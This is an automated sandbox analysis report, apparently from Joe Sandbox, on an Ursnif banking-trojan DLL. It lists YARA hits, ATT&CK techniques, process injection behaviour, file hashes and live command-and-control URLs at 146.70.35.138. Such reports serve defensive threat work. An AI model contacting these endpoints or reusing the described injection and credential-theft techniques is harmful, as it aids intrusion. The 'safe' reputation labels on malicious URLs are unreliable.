                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04895410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,2_2_04895410
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048912D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_048912D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B54DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_00B54DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_0489515F

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)1
                      Access Token Manipulation                      		1
                      File Deletion                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)813
                      Process Injection                      		1
                      Masquerading                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Valid Accounts                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Access Token Manipulation                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job813
                      Process Injection                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Rundll32                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 614013 Sample: nhLAwAo49f Startdate: 22/04/2022 Architecture: WINDOWS Score: 100 70 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->70 72 Found malware configuration 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 8 other signatures 2->76 11 loaddll32.exe 1 2->11         started        13 mshta.exe 1 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 WerFault.exe 2 9 11->17         started        19 WerFault.exe 3 9 11->19         started        21 WerFault.exe 3 9 11->21         started        23 powershell.exe 33 13->23         started        signatures5 26 rundll32.exe 1 6 15->26         started        86 Injects code into the Windows Explorer (explorer.exe) 23->86 88 Writes to foreign memory regions 23->88 90 Modifies the context of a thread in another process (thread injection) 23->90 92 2 other signatures 23->92 30 csc.exe 3 23->30         started        33 csc.exe 23->33         started        35 conhost.exe 23->35         started        process6 dnsIp7 64 146.70.35.138, 49773, 80 TENET-1ZA United Kingdom 26->64 94 System process connects to network (likely due to code injection or exploit) 26->94 96 Writes to foreign memory regions 26->96 98 Allocates memory in foreign processes 26->98 100 3 other signatures 26->100 37 control.exe 1 26->37         started        60 C:\Users\user\AppData\Local\...\f2vxj03f.dll, PE32 30->60 dropped 40 cvtres.exe 30->40         started        62 C:\Users\user\AppData\Local\...\ci1gjuu1.dll, PE32 33->62 dropped 42 cvtres.exe 33->42         started        file8 signatures9 process10 signatures11 78 Changes memory attributes in foreign processes to executable or writable 37->78 80 Injects code into the Windows Explorer (explorer.exe) 37->80 82 Writes to foreign memory regions 37->82 84 4 other signatures 37->84 44 explorer.exe 37->44 injected 47 rundll32.exe 37->47         started        process12 signatures13 102 Changes memory attributes in foreign processes to executable or writable 44->102 104 Self deletion via cmd delete 44->104 106 Writes to foreign memory regions 44->106 108 2 other signatures 44->108 49 cmd.exe 44->49         started        52 RuntimeBroker.exe 44->52 injected 54 cmd.exe 44->54         started        process14 signatures15 66 Uses ping.exe to sleep 49->66 68 Uses ping.exe to check the status of other devices and networks 49->68 56 conhost.exe 49->56         started        58 PING.EXE 49->58         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nhLAwAo49f.dll29%ReversingLabsWin32.Trojan.Lazy
                      nhLAwAo49f.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.4890000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZ0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://146.70.35.138/phpadmin/4B0%Avira URL Cloudsafe
                      http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src0%Avira URL Cloudsafe
                      http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB00%Avira URL Cloudsafe
                      http://177./h0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.srctrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZrundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://146.70.35.138/phpadmin/4Brundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://177./hrundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      146.70.35.138
                      		unknownUnited Kingdom
                      		2018TENET-1ZAtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:614013
                      Start date and time: 22/04/202218:10:412022-04-22 18:10:41 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:nhLAwAo49f (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@31/29@0/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21.3% (good quality ratio 20.1%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 113
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 5520 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: nhLAwAo49f.dll

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      18:12:12API Interceptor2x Sleep call for process: WerFault.exe modified
                      18:13:23API Interceptor34x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      146.70.35.138d6YCUW421p.dllGet hashmaliciousBrowse
                        FJHd.dllGet hashmaliciousBrowse
                          NdmYtW.dllGet hashmaliciousBrowse
                            pDut.dllGet hashmaliciousBrowse
                              HxEWwh74qT.dllGet hashmaliciousBrowse
                                b.exeGet hashmaliciousBrowse
                                  0x0007000000012676-63.exeGet hashmaliciousBrowse

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    TENET-1ZAd6YCUW421p.dllGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    FJHd.dllGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    NdmYtW.dllGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    pDut.dllGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    HxEWwh74qT.dllGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    o0nBmbV6auGet hashmaliciousBrowse
                                    • 163.200.142.51
                                    84wwQQbbDjGet hashmaliciousBrowse
                                    • 143.128.168.158
                                    o2AHUUgivhGet hashmaliciousBrowse
                                    • 146.239.92.86
                                    b.exeGet hashmaliciousBrowse
                                    • 146.70.35.138
                                    bKhQyaq7WP.exeGet hashmaliciousBrowse
                                    • 146.70.87.230
                                    wZtQzFZJYa.exeGet hashmaliciousBrowse
                                    • 146.70.87.230
                                    H7qgr6X0nvGet hashmaliciousBrowse
                                    • 155.233.139.115
                                    eoT6xLnNfY.exeGet hashmaliciousBrowse
                                    • 146.70.87.230
                                    jew.x86Get hashmaliciousBrowse
                                    • 146.69.137.13
                                    sora.armGet hashmaliciousBrowse
                                    • 155.232.149.247
                                    irq0Get hashmaliciousBrowse
                                    • 146.68.19.240
                                    l0zzxRl556.exeGet hashmaliciousBrowse
                                    • 146.70.87.230
                                    wuxznEjJoIGet hashmaliciousBrowse
                                    • 143.128.168.138
                                    BKpr0Ubn9lGet hashmaliciousBrowse
                                    • 196.249.7.64
                                    pandora.arm7-20220417-1500Get hashmaliciousBrowse
                                    • 152.106.89.16

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_843fd29667a3a8f656751f949c19ad5cff2ee117_7cac0383_1af40bd9\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.841963229435912
                                    Encrypted:false
                                    SSDEEP:96:xfHQ9nYysy9haSK7FISZpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSm9mBJ:xmniH0tGtjuq/u7sfS274Itb
                                    MD5:B9F67E01D203683E89B26D078734FCFF
                                    SHA1:38E8B043716123B26DCC00B71D43F38010EE7327
                                    SHA-256:3E241943DC4B98B263609B2F76F314FF9C4E0FA33AD75873B74987A28931C407
                                    SHA-512:0F4C257BC53AA4FD58357E622660E4E9116D74554747CAEA6F3B3BE3B1388241F4C5F6FBDCD8035E4AEBE8286E370B4B4C880B8089BA7972D6C281F57973D7AA
                                    Malicious:false
